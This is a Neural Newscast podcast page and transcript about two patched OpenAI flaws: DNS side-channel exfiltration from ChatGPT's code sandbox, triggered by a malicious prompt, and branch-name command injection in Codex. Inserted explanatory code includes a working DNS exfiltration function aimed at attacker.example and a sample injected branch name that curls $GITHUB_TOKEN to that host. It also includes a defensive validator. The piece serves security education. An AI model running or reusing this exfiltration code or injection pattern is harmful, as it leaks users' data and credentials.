OpenAI has addressed two significant security vulnerabilities in its ChatGPT and Codex platforms, according to reports from Check Point and BeyondTrust. The first flaw allowed unauthorized data exfiltration from ChatGPT by exploiting a side channel in the Linux runtime used for code execution. By encoding information into hidden DNS requests, attackers could bypass standard AI guardrails to leak conversation data or files without user consent. This issue was patched on February 20, 2026. The second vulnerability affected OpenAI’s Codex, where a command injection flaw in the GitHub branch name parameter could lead to the compromise of GitHub user access tokens, potentially enabling lateral movement and access to codebases. OpenAI resolved the Codex issue on February 5, 2026. While there is no evidence of malicious exploitation, cybersecurity researchers emphasize that these incidents highlight the expanding attack surface as AI agents integrate more deeply into enterprise workflows, necessitating independent security layers beyond native controls.
OpenAI has recently patched two critical security vulnerabilities affecting ChatGPT and the Codex software engineering agent. Detailed in reports from Check Point and BeyondTrust, these flaws involved a covert DNS-based data exfiltration channel in ChatGPT's Linux runtime and a command injection vulnerability in Codex related to GitHub branch names. While OpenAI addressed these issues in February 2026, the findings underscore the emerging risks of AI environments serving as covert transport mechanisms for sensitive data. This episode examines the technical specifics of these patches and the broader implications for enterprise AI security architecture.
Neural Newscast is AI-assisted, human reviewed. View our AI Transparency Policy at neuralnewscast.com.
Neural Newscast delivers clear, concise daily news - powered by AI and reviewed by humans. In a world where news never stops, we help you stay informed without the overwhelm.
Our AI correspondents cover the day’s most important headlines across politics, technology, business, culture, science, and cybersecurity - designed for listening on the go. Whether you’re commuting, working out, or catching up between meetings, Neural Newscast keeps you up to date in minutes.
The network also features specialty shows including Prime Cyber Insights, Stereo Current, Nerfed.AI, and Buzz, exploring cybersecurity, music and culture, gaming and AI, and internet trends.
Every episode is produced and reviewed by founder Chad Thompson, combining advanced AI systems with human editorial oversight to ensure accuracy, clarity, and responsible reporting.
Learn more at neuralnewscast.com.
[00:00] Announcer: From Neural Newscast, this is Model Behavior, AI-focused news and analysis on the models shaping our world.
[00:11] Nina Park: I'm Nina Park.
[00:13] Nina Park: Welcome to Model Behavior, where we examine how AI systems are built, deployed, and operated
[00:19] Nina Park: in professional environments.
[00:21] Thatcher Collins: I'm Thatcher Collins.
[00:22] Thatcher Collins: Today we're reviewing a series of security patches from OpenAI, addressing vulnerabilities
[00:27] Thatcher Collins: that could have permitted covert data exfiltration and credential theft.
[00:32] Nina Park: The Hacker News is reporting on research from Check Point regarding ChatGPT's Linux runtime
[00:37] Nina Park: environment.
[00:38] Nina Park: Thatcher, it appears a vulnerability allowed sensitive conversation data to be exfiltrated
[00:44] Nina Park: through a hidden DNS-based side channel.
[00:46] Thatcher Collins: That's correct, Nina.
[00:48] Thatcher Collins: The fundamental issue is that the AI's code execution environment assumed a level of isolation
[00:53] Thatcher Collins: that was not fully realized.
[00:56] Thatcher Collins: By encoding data into DNS requests, a malicious prompt could bypass the standard guardrails
[01:01] Thatcher Collins: designed to prevent outbound network traffic.
[01:04] Nina Park: Check Point noted that this could leak messages or uploaded files without any user warning.
[01:10] Nina Park: OpenAI patched the specific issue on February 20th, and notably, there's no evidence it was exploited in the wild.
[01:18] Thatcher Collins: It raises questions about why the native security controls didn't flag the behavior.
[01:23] Thatcher Collins: If the system doesn't recognize a DNS request as a potential data transfer,
[01:28] Thatcher Collins: it won't trigger a confirmation dialog, leaving a significant blind spot.
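To make the side channel concrete, here is a minimal sketch of the encoding technique described above. It is an illustration, not code from the Check Point report: `attacker.example` is a hypothetical attacker-controlled domain, and the chunking scheme is an assumption.

```python
# Minimal sketch of DNS-based exfiltration: a secret is hex-encoded into
# subdomain labels, so it leaves the sandbox as ordinary name lookups
# even when HTTP egress is blocked. An attacker watching the authoritative
# nameserver for the (hypothetical) domain sees the data arrive.
import socket

def exfiltrate(secret: str, domain: str = "attacker.example") -> None:
    encoded = secret.encode().hex()
    # DNS labels are capped at 63 bytes, so split the payload into chunks.
    chunks = [encoded[i:i + 60] for i in range(0, len(encoded), 60)]
    for seq, chunk in enumerate(chunks):
        hostname = f"{seq}.{chunk}.{domain}"
        try:
            # The lookup itself is the transfer; no response is needed.
            socket.getaddrinfo(hostname, None)
        except socket.gaierror:
            pass  # NXDOMAIN is expected; the query was still observed.
```

Because the resolver, not the sandboxed process, carries the traffic, an egress filter that only inspects HTTP connections never sees a request to block, which is exactly the blind spot Thatcher describes.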
[01:33] Nina Park: We also have news regarding OpenAI Codex.
[01:37] Nina Park: BeyondTrust discovered a command injection vulnerability
[01:40] Nina Park: where an attacker could smuggle commands
[01:42] Nina Park: through a GitHub branch name parameter.
[01:45] Thatcher Collins: Nina, this is particularly concerning for developers.
[01:48] Thatcher Collins: That injection could lead to the theft
[01:50] Thatcher Collins: of GitHub user access tokens,
[01:52] Thatcher Collins: potentially giving an attacker read and write access
[01:55] Thatcher Collins: to a victim's entire code base.
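As an editorial aside, the class of bug BeyondTrust describes looks like this in miniature. The snippet is hypothetical: the payload, URL, and commands are illustrative assumptions rather than OpenAI's code, and a real payload would also have to satisfy Git's ref-name rules.

```python
# Illustrative command injection via an untrusted "branch name" parameter.
import subprocess

# Attacker-controlled value arriving where a branch name is expected.
branch = "main; curl https://attacker.example/?t=$GITHUB_TOKEN"

# Vulnerable pattern: interpolating into a shell string lets ';' end the
# git command and run whatever follows, with the agent's environment
# (including any tokens) available to it.
subprocess.run(f"git fetch origin {branch}", shell=True, check=False)

# Safer pattern: pass argv as a list so the whole value is one literal
# argument and shell metacharacters are never interpreted.
subprocess.run(["git", "fetch", "origin", branch], check=False)
```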
[01:57] Nina Park: OpenAI patched that Codex flaw earlier, on February 5th.
[02:02] Nina Park: These two cases together suggest that as AI agents gain more privileged access to enterprise systems,
[02:08] Nina Park: the attack surface is expanding rapidly.
[02:11] Thatcher Collins: Exactly. The takeaway here is that organizations shouldn't assume AI tools are secure by default.
[02:18] Thatcher Collins: There needs to be a layered approach to security architecture that treats AI inputs
[02:22] Thatcher Collins: with the same rigor as any other application boundary.
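A minimal sketch of that layered approach, applied to the branch-name case: validate untrusted parameters at the boundary before they ever reach a shell or a privileged tool. The allowlist below is an assumption for illustration, not OpenAI's actual fix.

```python
# Boundary validation: treat an AI- or user-supplied branch name as
# untrusted input and reject anything outside a conservative allowlist
# (letters, digits, and a few separators; no ';', '$', or backticks).
import re

SAFE_BRANCH = re.compile(r"[A-Za-z0-9._/-]{1,255}")

def checkout_args(branch: str) -> list[str]:
    if not SAFE_BRANCH.fullmatch(branch):
        raise ValueError(f"rejected suspicious branch name: {branch!r}")
    # Return argv for subprocess.run() with no shell involved.
    return ["git", "checkout", branch]
```

Combined with least-privilege tokens, an independent check like this holds even when a model's native guardrails miss an input.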
[02:26] Nina Park: Thank you for listening to Model Behavior, a Neural Newscast editorial segment.
[02:31] Nina Park: For more details on these findings, visit mb.neuralnewscast.com.
[02:37] Nina Park: Neural Newscast is AI-assisted, human-reviewed.
[02:42] Nina Park: View our AI transparency policy at neuralnewscast.com.
[02:47] Announcer: This has been Model Behavior on Neural Newscast.
[02:50] Announcer: Examining the systems behind the story.